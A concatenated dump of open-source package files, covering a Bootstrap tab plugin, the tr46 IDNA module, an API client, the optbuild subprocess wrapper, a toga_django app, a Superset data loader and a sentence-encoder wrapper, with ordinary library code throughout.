if (showEvent.isDefaultPrevented() || hideEvent.isDefaultPrevented()) return
var $target = $(selector)
this.activate($this.closest('li'), $ul)
this.activate($target, $target.parent(), function () {
$previous.trigger({
type: 'hidden.bs.tab',
relatedTarget: $this[0]
})
$this.trigger({
type: 'shown.bs.tab',
relatedTarget: $previous[0]
})
})
}
Tab.prototype.activate = function (element, container, callback) {
var $active = container.find('> .active')
var transition = callback
&& $.support.transition
&& (($active.length && $active.hasClass('fade')) || !!container.find('> .fade').length)
function next() {
$active
.removeClass('active')
.find('> .dropdown-menu > .active')
.removeClass('active')
.end()
.find('[data-toggle="tab"]')
.attr('aria-expanded', false)
element
.addClass('active')
.find('[data-toggle="tab"]')
.attr('aria-expanded', true)
if (transition) {
element[0].offsetWidth // reflow for transition
element.addClass('in')
} else {
element.removeClass('fade')
}
if (element.parent('.dropdown-menu').length) {
element
.closest('li.dropdown')
.addClass('active')
.end()
.find('[data-toggle="tab"]')
.attr('aria-expanded', true)
}
callback && callback()
}
$active.length && transition ?
$active
.one('bsTransitionEnd', next)
.emulateTransitionEnd(Tab.TRANSITION_DURATION) :
next()
$active.removeClass('in')
}
// TAB PLUGIN DEFINITION
// =====================
function Plugin(option) {
return this.each(function () {
var $this = $(this)
var data = $this.data('bs.tab')
if (!data) $this.data('bs.tab', (data = new Tab(this)))
if (typeof option == 'string') data[option]()
})
}
var old = $.fn.tab
$.fn.tab = Plugin
$.fn.tab.Constructor = Tab
// TAB NO CONFLICT
// ===============
$.fn.tab.noConflict = function () {
$.fn.tab = old
return this
}
// TAB DATA-API
// ============
var clickHandler = function (e) {
e.preventDefault()
Plugin.call($(this), 'show')
}
$(document)
.on('click.bs.tab.data-api', '[data-toggle="tab"]', clickHandler)
.on('click.bs.tab.data-api', '[data-toggle="pill"]', clickHandler)
}(jQuery); | PypiClean |
/py_tgcalls_kaizoku-0.9.5-cp39-cp39-win_amd64.whl/pytgcalls/node_modules/tr46/index.js | "use strict";
var punycode = require("punycode");
var mappingTable = require("./lib/mappingTable.json");
var PROCESSING_OPTIONS = {
TRANSITIONAL: 0,
NONTRANSITIONAL: 1
};
function normalize(str) { // fix bug in v8
return str.split('\u0000').map(function (s) { return s.normalize('NFC'); }).join('\u0000');
}
function findStatus(val) {
var start = 0;
var end = mappingTable.length - 1;
while (start <= end) {
var mid = Math.floor((start + end) / 2);
var target = mappingTable[mid];
if (target[0][0] <= val && target[0][1] >= val) {
return target;
} else if (target[0][0] > val) {
end = mid - 1;
} else {
start = mid + 1;
}
}
return null;
}
var regexAstralSymbols = /[\uD800-\uDBFF][\uDC00-\uDFFF]/g;
function countSymbols(string) {
return string
// replace every surrogate pair with a BMP symbol
.replace(regexAstralSymbols, '_')
// then get the length
.length;
}
function mapChars(domain_name, useSTD3, processing_option) {
var hasError = false;
var processed = "";
var len = countSymbols(domain_name);
for (var i = 0; i < len; ++i) {
var codePoint = domain_name.codePointAt(i);
var status = findStatus(codePoint);
switch (status[1]) {
case "disallowed":
hasError = true;
processed += String.fromCodePoint(codePoint);
break;
case "ignored":
break;
case "mapped":
processed += String.fromCodePoint.apply(String, status[2]);
break;
case "deviation":
if (processing_option === PROCESSING_OPTIONS.TRANSITIONAL) {
processed += String.fromCodePoint.apply(String, status[2]);
} else {
processed += String.fromCodePoint(codePoint);
}
break;
case "valid":
processed += String.fromCodePoint(codePoint);
break;
case "disallowed_STD3_mapped":
if (useSTD3) {
hasError = true;
processed += String.fromCodePoint(codePoint);
} else {
processed += String.fromCodePoint.apply(String, status[2]);
}
break;
case "disallowed_STD3_valid":
if (useSTD3) {
hasError = true;
}
processed += String.fromCodePoint(codePoint);
break;
}
}
return {
string: processed,
error: hasError
};
}
var combiningMarksRegex = /[\u0300-\u036F\u0483-\u0489\u0591-\u05BD\u05BF\u05C1\u05C2\u05C4\u05C5\u05C7\u0610-\u061A\u064B-\u065F\u0670\u06D6-\u06DC\u06DF-\u06E4\u06E7\u06E8\u06EA-\u06ED\u0711\u0730-\u074A\u07A6-\u07B0\u07EB-\u07F3\u0816-\u0819\u081B-\u0823\u0825-\u0827\u0829-\u082D\u0859-\u085B\u08E4-\u0903\u093A-\u093C\u093E-\u094F\u0951-\u0957\u0962\u0963\u0981-\u0983\u09BC\u09BE-\u09C4\u09C7\u09C8\u09CB-\u09CD\u09D7\u09E2\u09E3\u0A01-\u0A03\u0A3C\u0A3E-\u0A42\u0A47\u0A48\u0A4B-\u0A4D\u0A51\u0A70\u0A71\u0A75\u0A81-\u0A83\u0ABC\u0ABE-\u0AC5\u0AC7-\u0AC9\u0ACB-\u0ACD\u0AE2\u0AE3\u0B01-\u0B03\u0B3C\u0B3E-\u0B44\u0B47\u0B48\u0B4B-\u0B4D\u0B56\u0B57\u0B62\u0B63\u0B82\u0BBE-\u0BC2\u0BC6-\u0BC8\u0BCA-\u0BCD\u0BD7\u0C00-\u0C03\u0C3E-\u0C44\u0C46-\u0C48\u0C4A-\u0C4D\u0C55\u0C56\u0C62\u0C63\u0C81-\u0C83\u0CBC\u0CBE-\u0CC4\u0CC6-\u0CC8\u0CCA-\u0CCD\u0CD5\u0CD6\u0CE2\u0CE3\u0D01-\u0D03\u0D3E-\u0D44\u0D46-\u0D48\u0D4A-\u0D4D\u0D57\u0D62\u0D63\u0D82\u0D83\u0DCA\u0DCF-\u0DD4\u0DD6\u0DD8-\u0DDF\u0DF2\u0DF3\u0E31\u0E34-\u0E3A\u0E47-\u0E4E\u0EB1\u0EB4-\u0EB9\u0EBB\u0EBC\u0EC8-\u0ECD\u0F18\u0F19\u0F35\u0F37\u0F39\u0F3E\u0F3F\u0F71-\u0F84\u0F86\u0F87\u0F8D-\u0F97\u0F99-\u0FBC\u0FC6\u102B-\u103E\u1056-\u1059\u105E-\u1060\u1062-\u1064\u1067-\u106D\u1071-\u1074\u1082-\u108D\u108F\u109A-\u109D\u135D-\u135F\u1712-\u1714\u1732-\u1734\u1752\u1753\u1772\u1773\u17B4-\u17D3\u17DD\u180B-\u180D\u18A9\u1920-\u192B\u1930-\u193B\u19B0-\u19C0\u19C8\u19C9\u1A17-\u1A1B\u1A55-\u1A5E\u1A60-\u1A7C\u1A7F\u1AB0-\u1ABE\u1B00-\u1B04\u1B34-\u1B44\u1B6B-\u1B73\u1B80-\u1B82\u1BA1-\u1BAD\u1BE6-\u1BF3\u1C24-\u1C37\u1CD0-\u1CD2\u1CD4-\u1CE8\u1CED\u1CF2-\u1CF4\u1CF8\u1CF9\u1DC0-\u1DF5\u1DFC-\u1DFF\u20D0-\u20F0\u2CEF-\u2CF1\u2D7F\u2DE0-\u2DFF\u302A-\u302F\u3099\u309A\uA66F-\uA672\uA674-\uA67D\uA69F\uA6F0\uA6F1\uA802\uA806\uA80B\uA823-\uA827\uA880\uA881\uA8B4-\uA8C4\uA8E0-\uA8F1\uA926-\uA92D\uA947-\uA953\uA980-\uA983\uA9B3-\uA9C0\uA9E5\uAA29-\uAA36\uAA43\uAA4C\uAA4D\uAA7B-\uAA7D\uAAB0\uAAB2-\uAAB4\uAAB7\uAAB8\uAABE\uAABF\uAAC1\uAAEB-\uAAEF\uAAF5\uAAF6\uABE3-\uABEA\uABEC\uABED\uFB1E\uFE00-\uFE0F\uFE20-\uFE2D]|\uD800[\uDDFD\uDEE0\uDF76-\uDF7A]|\uD802[\uDE01-\uDE03\uDE05\uDE06\uDE0C-\uDE0F\uDE38-\uDE3A\uDE3F\uDEE5\uDEE6]|\uD804[\uDC00-\uDC02\uDC38-\uDC46\uDC7F-\uDC82\uDCB0-\uDCBA\uDD00-\uDD02\uDD27-\uDD34\uDD73\uDD80-\uDD82\uDDB3-\uDDC0\uDE2C-\uDE37\uDEDF-\uDEEA\uDF01-\uDF03\uDF3C\uDF3E-\uDF44\uDF47\uDF48\uDF4B-\uDF4D\uDF57\uDF62\uDF63\uDF66-\uDF6C\uDF70-\uDF74]|\uD805[\uDCB0-\uDCC3\uDDAF-\uDDB5\uDDB8-\uDDC0\uDE30-\uDE40\uDEAB-\uDEB7]|\uD81A[\uDEF0-\uDEF4\uDF30-\uDF36]|\uD81B[\uDF51-\uDF7E\uDF8F-\uDF92]|\uD82F[\uDC9D\uDC9E]|\uD834[\uDD65-\uDD69\uDD6D-\uDD72\uDD7B-\uDD82\uDD85-\uDD8B\uDDAA-\uDDAD\uDE42-\uDE44]|\uD83A[\uDCD0-\uDCD6]|\uDB40[\uDD00-\uDDEF]/;
function validateLabel(label, processing_option) {
if (label.substr(0, 4) === "xn--") {
label = punycode.toUnicode(label);
processing_option = PROCESSING_OPTIONS.NONTRANSITIONAL;
}
var error = false;
if (normalize(label) !== label ||
(label[3] === "-" && label[4] === "-") ||
label[0] === "-" || label[label.length - 1] === "-" ||
label.indexOf(".") !== -1 ||
label.search(combiningMarksRegex) === 0) {
error = true;
}
var len = countSymbols(label);
for (var i = 0; i < len; ++i) {
var status = findStatus(label.codePointAt(i));
if ((processing === PROCESSING_OPTIONS.TRANSITIONAL && status[1] !== "valid") ||
(processing === PROCESSING_OPTIONS.NONTRANSITIONAL &&
status[1] !== "valid" && status[1] !== "deviation")) {
error = true;
break;
}
}
return {
label: label,
error: error
};
}
function processing(domain_name, useSTD3, processing_option) {
var result = mapChars(domain_name, useSTD3, processing_option);
result.string = normalize(result.string);
var labels = result.string.split(".");
for (var i = 0; i < labels.length; ++i) {
try {
var validation = validateLabel(labels[i]);
labels[i] = validation.label;
result.error = result.error || validation.error;
} catch(e) {
result.error = true;
}
}
return {
string: labels.join("."),
error: result.error
};
}
module.exports.toASCII = function(domain_name, useSTD3, processing_option, verifyDnsLength) {
var result = processing(domain_name, useSTD3, processing_option);
var labels = result.string.split(".");
labels = labels.map(function(l) {
try {
return punycode.toASCII(l);
} catch(e) {
result.error = true;
return l;
}
});
if (verifyDnsLength) {
var total = labels.slice(0, labels.length - 1).join(".").length;
if (total.length > 253 || total.length === 0) {
result.error = true;
}
for (var i=0; i < labels.length; ++i) {
if (labels.length > 63 || labels.length === 0) {
result.error = true;
break;
}
}
}
if (result.error) return null;
return labels.join(".");
};
module.exports.toUnicode = function(domain_name, useSTD3) {
var result = processing(domain_name, useSTD3, PROCESSING_OPTIONS.NONTRANSITIONAL);
return {
domain: result.string,
error: result.error
};
};
module.exports.PROCESSING_OPTIONS = PROCESSING_OPTIONS; | PypiClean |
/bmlx-argo-workflows-1.0.5.tar.gz/bmlx-argo-workflows-1.0.5/docs/V1SecretEnvSource.md | # V1SecretEnvSource
SecretEnvSource selects a Secret to populate the environment variables with. The contents of the target Secret's Data field will represent the key-value pairs as environment variables.
## Properties
Name | Type | Description | Notes
------------ | ------------- | ------------- | -------------
**name** | **str** | Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names | [optional]
**optional** | **bool** | Specify whether the Secret must be defined | [optional]
[[Back to Model list]](../README.md#documentation-for-models) [[Back to API list]](../README.md#documentation-for-api-endpoints) [[Back to README]](../README.md)
| PypiClean |
/lj_api_client-0.1.1-py3-none-any.whl/lj_api_client/client.py | from typing import List
import requests as rq
from pydantic import validate_arguments
from lj_api_client import utils, resources, schemas, exceptions
class Client:
DEFAULT_HOST = "https://public-api.livejourney.io"
def __init__(self, api_key, host=None, api_version='v1'):
if not host:
host = self.DEFAULT_HOST
self._base_url = utils.urljoin(host, 'api', api_version)
self._session = rq.Session()
self._session.headers.update({
'x-api-key': api_key,
'content-type': 'application/json'
})
self._resources = {
'users': resources.UsersPool(
utils.urljoin(self._base_url, 'users'), self._session
),
'workspaces': resources.WorkspacesPool(
utils.urljoin(self._base_url, 'workspaces'), self._session
),
}
@property
def resources(self):
return self._resources
@property
def users(self):
return self.resources.get('users')
@property
def workspaces(self):
return self.resources.get('workspaces')
def get_user(self) -> rq.Response:
return self.users.fetch_list()
def get_workspaces(self) -> rq.Request:
return self.workspaces.fetch_list()
def get_workspace(self, workspace_id: str) -> rq.Response:
return self.workspaces.fetch_item(workspace_id)
def get_cards(self, workspace_id: str) -> rq.Response:
return self.workspaces.cards(workspace_id).fetch_list()
def get_card(self, workspace_id: str, card_id: str) -> rq.Response:
return self.workspaces.cards(workspace_id).fetch_item(card_id)
@validate_arguments
def create_card(self, workspace_id: str, card_data: schemas.CardCreationModel) -> rq.Request:
return self.workspaces.cards(workspace_id).create_item(card_data.dict(exclude_none=True))
@validate_arguments
def update_card(self, workspace_id: str, card_id: str, card_data: schemas.CardUpdateModel) -> rq.Request:
return self.workspaces.cards(workspace_id).update_item(card_id, card_data.dict(exclude_none=True))
def delete_card(self, workspace_id: str, card_id: str) -> rq.Response:
return self.workspaces.cards(workspace_id).delete_item(card_id)
def upload_data_to_card(self, workspace_id: str, card_id: str, log_file_path: str, desc_file_path: str = None):
res = self.get_card(workspace_id, card_id)
if res.status_code != 200:
exceptions.raise_request_exception_from_res(res)
last_import_status = res.json()['data']['card']['last_import_status']
if last_import_status not in ['EMPTY', 'DONE', 'ERROR']:
raise exceptions.CardNotReadyError('Previous data import in progress, please retry later')
elif last_import_status == 'ERROR':
raise exceptions.CardError('An error occurred on your card please contact support or create new card')
files_data = [
file_data
for file_data in [(log_file_path, 'log'), (desc_file_path, 'descriptive')]
if file_data[0]
]
for file_path, _ in files_data:
utils.validate_file_path(file_path)
for file_path, data_type in files_data:
res = self.workspaces.cards(workspace_id).presigned_url(card_id).fetch_list(params={'data_type': data_type})
if res.status_code != 200:
exceptions.raise_request_exception_from_res(res)
presigned_url = res.json()['data']['presigned_url']
with open(file_path, 'rb') as f:
res = rq.post(presigned_url['url'], files={'file': f}, data=presigned_url['fields'])
if res.status_code != 204:
exceptions.raise_request_exception_from_res(res)
res = self.workspaces.cards(workspace_id).feed(card_id).create_item({})
if res.status_code != 201:
exceptions.raise_request_exception_from_res(res)
return res | PypiClean |
/optbuild-0.2.1.tar.gz/optbuild-0.2.1/lib/optbuild.py | from __future__ import division, absolute_import, print_function
from six import viewitems, string_types, with_metaclass
__version__ = "$Revision: 1.30 $"
from distutils.spawn import find_executable
from functools import partial
import optparse
import signal
from subprocess import Popen, PIPE
import sys
from autolog import autolog
_log = autolog()
_log_exec = _log[".exec"]
# XXX: we should eliminate dependencies on optparse, I don't think it
# gets us anything
def _write_log_exec(cmdline):
cmdline_strings = [arg for arg in cmdline if isinstance(arg, string_types)]
if " " in "".join(cmdline_strings):
# quote every arg
_log_exec.info(" ".join("'%s'" % arg.encode("unicode_escape")
for arg in cmdline_strings))
else:
_log_exec.info(" ".join(cmdline_strings))
# XXX: should probably be deprecated in favor of subprocess.CalledProcessError
class ReturncodeError(Exception):
## this doesn't have an errno, so it can't be an OSError
def __init__(self, cmdline, returncode, output=None, error=None):
self.cmdline = cmdline
self.returncode = returncode
self.output = output
self.error = error
def __str__(self):
return "%s returned %s" % (self.cmdline[0], self.returncode)
class SignalError(ReturncodeError):
def __str__(self):
try:
signal_text = _signals[-self.returncode]
except KeyError:
signal_text = "signal %d" % -self.returncode
return "%s terminated by %s" % (self.cmdline[0], signal_text)
def _returncode_error_factory(cmdline, returncode, output=None, error=None):
if returncode >= 0:
error_cls = ReturncodeError
else:
error_cls = SignalError
raise error_cls(cmdline, returncode, output, error)
class Stdin(object):
"""
indicate that an "argument" is actually input
"""
def __init__(self, data):
self.data = data
class Cwd(str):
"""
indicate that an "argument" is a directory to change to
"""
pass
class OptionBuilder(optparse.OptionParser):
"""
GNU long-args style option builder
"""
def __init__(self, prog=None, *args, **kwargs):
optparse.OptionParser.__init__(self, prog=prog, *args, **kwargs)
self.dry_run = False
def __call__(self, *args, **kwargs):
return self.run(*args, **kwargs)
def __str__(self):
return self.prog
def __repr__(self):
return "%s('%s')" % (self.__class__, str(self).encode("string_escape"))
@staticmethod
def convert_option_name(option):
return option.replace("_", "-")
def _build_option(self, option, value):
"""always returns a list"""
option = self.convert_option_name(option)
if not isinstance(value, list):
value = [value]
res = []
for value_item in value:
res.extend(self.build_option(option, value_item))
return res
def _build_options(self, options):
# XXX: use the option_list to check/convert the options
# can't use a listcomp because _build_option always returns a
# list and the empty ones have to be eaten somehow
res = []
for key in sorted(options.keys()):
res.extend(self._build_option(key, options[key]))
return res
@staticmethod
def build_option(option, value):
if value is True:
return ["--%s" % option]
elif value is False or value is None:
return []
else:
return ["--%s=%s" % (option, value)]
def build_args(self, args=(), options={}):
return self._build_options(options) + list(args)
def get_prog(self, prog):
"""
virtual function to be overriden
"""
if prog is None:
prog = self.prog
return prog
def build_cmdline(self, args=(), options={}, prog=None):
res = [self.get_prog(prog)]
res.extend(self.build_args(args, options))
_write_log_exec(res)
return res
def _popen(self, args, options, input=None,
stdin=None, stdout=None, stderr=None, cwd=None):
cmdline = self.build_cmdline(args, options)
if self.dry_run:
if cwd or input:
# XXX: print "cd %s" or use a here document
raise NotImplementedError
print(" ".join(cmdline))
return
try:
pipe = Popen(cmdline, stdin=stdin, stdout=stdout, stderr=stderr,
cwd=cwd)
output, error = pipe.communicate(input)
returncode = pipe.wait()
except OSError as os_exception:
print("Failed to run command {}: {}".format(" ".join(cmdline),
os_exception),
file=sys.stderr)
# Re raise the exception and exit
raise
if returncode:
_returncode_error_factory(cmdline, returncode, output, error)
res = []
if stdout == PIPE:
res.append(output)
if stderr == PIPE:
res.append(error)
# if there's only one of (output, error), then only return it
if len(res) == 1:
return res[0]
else:
# otherwise return a tuple of both
return tuple(res)
def _getoutput(self, args, options, stdout=None, stderr=None):
input = None
stdin = None
cwd = None
arg_list = []
for arg in args:
if isinstance(arg, Stdin):
if isinstance(arg.data, string_types):
input = arg.data
stdin = PIPE
elif isinstance(arg.data, file):
stdin = arg.data
else:
raise ValueError("Stdin arg does not contain basestring"
" or file")
elif isinstance(arg, Cwd):
cwd = arg
else:
arg_list.append(arg)
return self._popen(tuple(arg_list), options, input,
stdin, stdout, stderr, cwd)
def getoutput_error(self, *args, **kwargs):
"""
runs a program and gets the stdout and error
"""
return self._getoutput(args, kwargs, stdout=PIPE, stderr=PIPE)
def getoutput(self, *args, **kwargs):
"""
runs a program and gets the stdout
"""
return self._getoutput(args, kwargs, stdout=PIPE)
def run(self, *args, **kwargs):
"""
runs a program and ignores the stdout
"""
self._getoutput(args, kwargs)
return None
def popen(self, *args, **kwargs):
"""
spawns a program and doesn't wait for it to return
"""
cmdline = self.build_cmdline(args, kwargs)
return Popen(cmdline)
class OptionBuilder_LongOptWithSpace(OptionBuilder):
@staticmethod
def build_option(option, value):
if value is True:
return ["--%s" % option]
elif value is False or value is None:
return []
else:
return ["--%s" % option, str(value)]
class OptionBuilder_ShortOptWithSpace(OptionBuilder):
@staticmethod
def build_option(option, value):
if value is True:
return ["-%s" % option]
elif value is False or value is None:
return []
else:
return ["-%s" % option, str(value)]
class OptionBuilder_ShortOptWithEquals(OptionBuilder):
@staticmethod
def build_option(option, value):
if value is True:
return ["-%s" % option]
elif value is False or value is None:
return []
else:
return ["-%s=%s" % (option, str(value))]
class OptionBuilder_ShortOptWithSpace_TF(OptionBuilder_ShortOptWithSpace):
# XXX: this should be an AddableMixin instead
@staticmethod
def build_option(option, value):
parent_build_option = \
partial(OptionBuilder_ShortOptWithSpace.build_option, option)
if value is True:
return parent_build_option("T")
elif value is False:
return parent_build_option("F")
else:
return parent_build_option(value)
class OptionBuilder_NoHyphenWithEquals(OptionBuilder):
@staticmethod
def build_option(option, value):
if isinstance(value, bool):
value = int(value)
elif value is None:
return []
return ["%s=%s" % (option, value)]
class AddableMixinMetaclass(type):
def __add__(cls, other):
name = "(%s.%s + %s.%s)" % (cls.__module__, cls.__name__,
other.__module__, other.__name__)
return type(name, (cls, other), {})
__radd__ = __add__
def __repr__(cls):
if cls.__name__.startswith("("):
# eliminates the __module__ part
return "<class '%s'>" % cls.__name__
else:
return type.__repr__(cls)
def _id(obj):
# found on python-dev somewhere to get around negative id()
return (sys.maxsize * 2 + 1) & id(obj)
class AddableMixin(with_metaclass(AddableMixinMetaclass, object)):
def __repr__(self):
if self.__class__.__name__.startswith("("):
return "<%s object at 0x%x>" % (self.__class__.__name__, _id(self))
else:
return super(AddableMixin, self).__repr__(self)
def __new__(cls, *args, **kwargs):
# beginning in Python 2.6, object.__new__ no longer takes
# args, and raises a deprecation warning, so we strip out any
# args and kwargs (technically OK) before continuing on
new = super(AddableMixin, cls).__new__
if new == object.__new__:
return new(cls)
else:
return new(cls, *args, **kwargs)
def __init__(self, *args, **kwargs):
# different depending on whether old- and new-style classes
# are being mixed, because object.__init__() does not call the
# next method. It does not cooperate with super() by lack of
# design. I think this is a bug, but I'm sure the Python core
# developers wouldn't
# if this mixing with a new-style class
if type(self).mro()[-1] is object:
supertype = AddableMixin
else:
# for old-style classes, object goes in the middle
supertype = object
init_unbound = super(supertype, type(self)).__init__
init_bound = super(supertype, self).__init__
# see comment for AddableMixin.__new__
if init_unbound == object.__init__:
return init_bound()
else:
return init_bound(*args, **kwargs)
class Mixin_ArgsFirst(AddableMixin):
def build_args(self, args=(), options={}):
return list(args) + self._build_options(options)
class Mixin_NoConvertUnderscore(AddableMixin):
@staticmethod
def convert_option_name(option):
return option
class Mixin_UseFullProgPath(AddableMixin):
def get_prog(self, prog):
prog = OptionBuilder.get_prog(self, prog)
res = find_executable(prog)
if res is None:
raise IOError("can't find %s in path" % prog)
return res
def _setup_signals():
res = {}
for key, value in viewitems(vars(signal)):
if key.startswith("SIG") and key[4] != "_":
res[value] = key
return res
_signals = _setup_signals()
def main(args):
pass
def _test(*args, **keywds):
import doctest
doctest.testmod(sys.modules[__name__], *args, **keywds)
if __name__ == "__main__":
if __debug__:
_test()
sys.exit(main(sys.argv[1:])) | PypiClean |
/toga_django-0.2.15-py3-none-any.whl/toga_django/app.py | import base64
import marshal
import os
import py_compile
import tempfile
from django.conf.urls import url
from django.shortcuts import render
from django.utils.safestring import mark_safe
from toga.interface.app import App as AppInterface
from toga.interface.widgets.base import Widget
from .window import Window
from .bootstrap import bootstrap
from . import impl
class MainWindow(Window):
pass
class App(AppInterface):
_MAIN_WINDOW_CLASS = MainWindow
def __init__(self, name, app_id, icon=None, id=None, startup=None):
# Set the icon for the app
# Icon.app_icon = Icon.load(icon, default=TIBERIUS_ICON)
self.windows = []
super().__init__(
name=name,
app_id=app_id,
# icon=Icon.app_icon,
id=id,
startup=startup,
)
self._startup()
def _startup(self):
self.startup()
def main_loop(self):
pass
# ====
# def materialize(self):
# app = render.App(self.name, self.app_id, self.ports)
# app.main_window = self.main_window.materialize()
# for win_id, win in self.windows:
# app.windows.append(win.materialize())
# return app
def __str__(self):
return mark_safe(self.main_window._impl.__html__())
def get_urls(self):
urlpatterns = [
url(r'^$', self.home, name='home'),
] + self.main_window.get_urls()
for win_id, window in self.windows:
urlpatterns += window.get_urls()
return urlpatterns
@property
def urls(self):
return self.get_urls(), 'toga', self.name
@property
def ports(self):
return ",".join(
"%s=%s" % (name, widget.id)
for name, widget in self.__dict__.items()
if isinstance(widget, Widget)
)
def home(self, request):
# app = self.app.materialize()
# if app.main_window.id == self.id:
# window = app.main_window
# else:
# try:
# window = app.windows[self.id]
# except KeyError:
# raise Exception("Unknown window")
sourcefile = os.path.join(os.path.dirname(__file__), 'impl', '__init__.py')
fd, tempname = tempfile.mkstemp()
py_compile.compile(sourcefile, cfile=tempname, doraise=True)
with open(os.path.join(os.path.dirname(sourcefile), tempname), 'rb') as compiled:
toga = base64.encodebytes(compiled.read())
widgets = {}
for widget in ["app", "window", "box", "button", "label", "textinput", "webview"]:
sourcefile = os.path.join(os.path.dirname(__file__), 'impl', "%s.py" % widget)
fd, tempname = tempfile.mkstemp()
py_compile.compile(sourcefile, cfile=tempname, doraise=True)
with open(os.path.join(os.path.dirname(sourcefile), tempname), 'rb') as compiled:
bytecode = base64.encodebytes(compiled.read())
widgets['toga.%s' % widget] = {
'filename': sourcefile,
'bytecode': bytecode,
}
context = {
'toga': toga,
'widgets': widgets,
'bootstrap': base64.encodebytes(b'\xee\x0c\r\n00000000' + marshal.dumps(bootstrap.__code__)).strip(),
'app': self,
'callbacks': {
# 'sample': base64.encodebytes(b'\x08\x1c\xe8VU\x00\x00\x00' + marshal.dumps(sample.__code__)).strip()
'%s-%s' % (widget, message): {
'filename': '<string>',
'bytecode': base64.encodebytes(b'\xee\x0c\r\n00000000' + marshal.dumps(callback.__code__)).strip()
}
for (widget, message), callback in self.main_window.callbacks.items()
}
}
return render(request, 'toga/app.html', context) | PypiClean |
/wpt-superset-1.0.1.tar.gz/wpt-superset-1.0.1/superset/data/energy.py | """Loads datasets, dashboards and slices in a new superset instance"""
# pylint: disable=C,R,W
import gzip
import os
import textwrap
import pandas as pd
from sqlalchemy import Float, String
from superset import db
from superset.connectors.sqla.models import SqlMetric
from superset.utils import core as utils
from .helpers import DATA_FOLDER, merge_slice, misc_dash_slices, Slice, TBL
def load_energy():
"""Loads an energy related dataset to use with sankey and graphs"""
tbl_name = 'energy_usage'
with gzip.open(os.path.join(DATA_FOLDER, 'energy.json.gz')) as f:
pdf = pd.read_json(f)
pdf.to_sql(
tbl_name,
db.engine,
if_exists='replace',
chunksize=500,
dtype={
'source': String(255),
'target': String(255),
'value': Float(),
},
index=False)
print('Creating table [wb_health_population] reference')
tbl = db.session.query(TBL).filter_by(table_name=tbl_name).first()
if not tbl:
tbl = TBL(table_name=tbl_name)
tbl.description = 'Energy consumption'
tbl.database = utils.get_or_create_main_db()
if not any(col.metric_name == 'sum__value' for col in tbl.metrics):
tbl.metrics.append(SqlMetric(
metric_name='sum__value',
expression='SUM(value)',
))
db.session.merge(tbl)
db.session.commit()
tbl.fetch_metadata()
slc = Slice(
slice_name='Energy Sankey',
viz_type='sankey',
datasource_type='table',
datasource_id=tbl.id,
params=textwrap.dedent("""\
{
"collapsed_fieldsets": "",
"groupby": [
"source",
"target"
],
"having": "",
"metric": "sum__value",
"row_limit": "5000",
"slice_name": "Energy Sankey",
"viz_type": "sankey",
"where": ""
}
"""),
)
misc_dash_slices.add(slc.slice_name)
merge_slice(slc)
slc = Slice(
slice_name='Energy Force Layout',
viz_type='directed_force',
datasource_type='table',
datasource_id=tbl.id,
params=textwrap.dedent("""\
{
"charge": "-500",
"collapsed_fieldsets": "",
"groupby": [
"source",
"target"
],
"having": "",
"link_length": "200",
"metric": "sum__value",
"row_limit": "5000",
"slice_name": "Force",
"viz_type": "directed_force",
"where": ""
}
"""),
)
misc_dash_slices.add(slc.slice_name)
merge_slice(slc)
slc = Slice(
slice_name='Heatmap',
viz_type='heatmap',
datasource_type='table',
datasource_id=tbl.id,
params=textwrap.dedent("""\
{
"all_columns_x": "source",
"all_columns_y": "target",
"canvas_image_rendering": "pixelated",
"collapsed_fieldsets": "",
"having": "",
"linear_color_scheme": "blue_white_yellow",
"metric": "sum__value",
"normalize_across": "heatmap",
"slice_name": "Heatmap",
"viz_type": "heatmap",
"where": "",
"xscale_interval": "1",
"yscale_interval": "1"
}
"""),
)
misc_dash_slices.add(slc.slice_name)
merge_slice(slc) | PypiClean |
/vectorhub_nightly-1.2.0.2021.6.2.1.17.47.427274-py3-none-any.whl/vectorhub/encoders/text/tfhub/use_lite.py | import warnings
import numpy as np
from datetime import date
from ....base import catch_vector_errors
from ....doc_utils import ModelDefinition
from ....import_utils import is_all_dependency_installed
from ....models_dict import MODEL_REQUIREMENTS
from ..base import BaseText2Vec
from .use import USE2Vec
if is_all_dependency_installed(MODEL_REQUIREMENTS['encoders-text-tfhub-use-multi']):
import tensorflow as tf
from tensorflow.python.framework.errors_impl import NotFoundError
try:
import tensorflow_text
except NotFoundError:
print('The installed Tensorflow Text version is not aligned with tensorflow, make sure that tensorflow-text version is same version as tensorflow')
USELiteModelDefinition = ModelDefinition(markdown_filepath='encoders/text/tfhub/use_lite.md')
class USELite2Vec(BaseText2Vec):
definition = USELiteModelDefinition
urls = {
"https://tfhub.dev/google/universal-sentence-encoder-lite/2": {'vector_length': 512}
}
def __init__(self, model_url: str = 'https://tfhub.dev/google/universal-sentence-encoder-lite/2'):
list_of_urls = [
"https://tfhub.dev/google/universal-sentence-encoder-lite/2",
]
self.validate_model_url(model_url, list_of_urls)
self.vector_length = 512
warnings.warn("Using USELite2Vec requires disabling tf2 behaviours: tf.disable_v2_behavior(). Meaning it can break the usage of other models if ran. If you are ok with this run model.init() to disable tf2 and run USELite2Vec")
def init(self):
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
self.input_placeholder = tf.sparse_placeholder(tf.int64, shape=[None, None])
self.model = hub.Module("https://tfhub.dev/google/universal-sentence-encoder-lite/2")
self.encodings = module(inputs=dict(
values=self.input_placeholder.values,
indices=self.input_placeholder.indices,
dense_shape=self.input_placeholder.dense_shape
))
with tf.Session() as sess:
spm_path = sess.run(module(signature="spm_path"))
self.sp = spm.SentencePieceProcessor()
self.sp.Load(spm_path)
def process_texts(self, texts):
ids = [self.sp.EncodeAsIds(x) for x in texts]
return (
[item for sublist in ids for item in sublist],
[[row,col] for row in range(len(ids)) for col in range(len(ids[row]))],
(len(ids), max(len(x) for x in ids))
)
@catch_vector_errors
def encode(self, text):
values, indices, dense_shape = self.process_texts([text])
with tf.Session() as session:
session.run([tf.global_variables_initializer(), tf.tables_initializer()])
message_embeddings = session.run(self.encodings,
feed_dict={self.input_placeholder.values: values,
self.input_placeholder.indices: indices,
self.input_placeholder.dense_shape: dense_shape})
return np.array(message_embeddings)[0].tolist()
@catch_vector_errors
def bulk_encode(self, texts, threads=10, chunks=100):
values, indices, dense_shape = self.process_texts(texts)
with tf.Session() as session:
session.run([tf.global_variables_initializer(), tf.tables_initializer()])
message_embeddings = session.run(self.encodings,
feed_dict={self.input_placeholder.values: values,
self.input_placeholder.indices: indices,
self.input_placeholder.dense_shape: dense_shape})
return np.array(message_embeddings).tolist() | PypiClean |
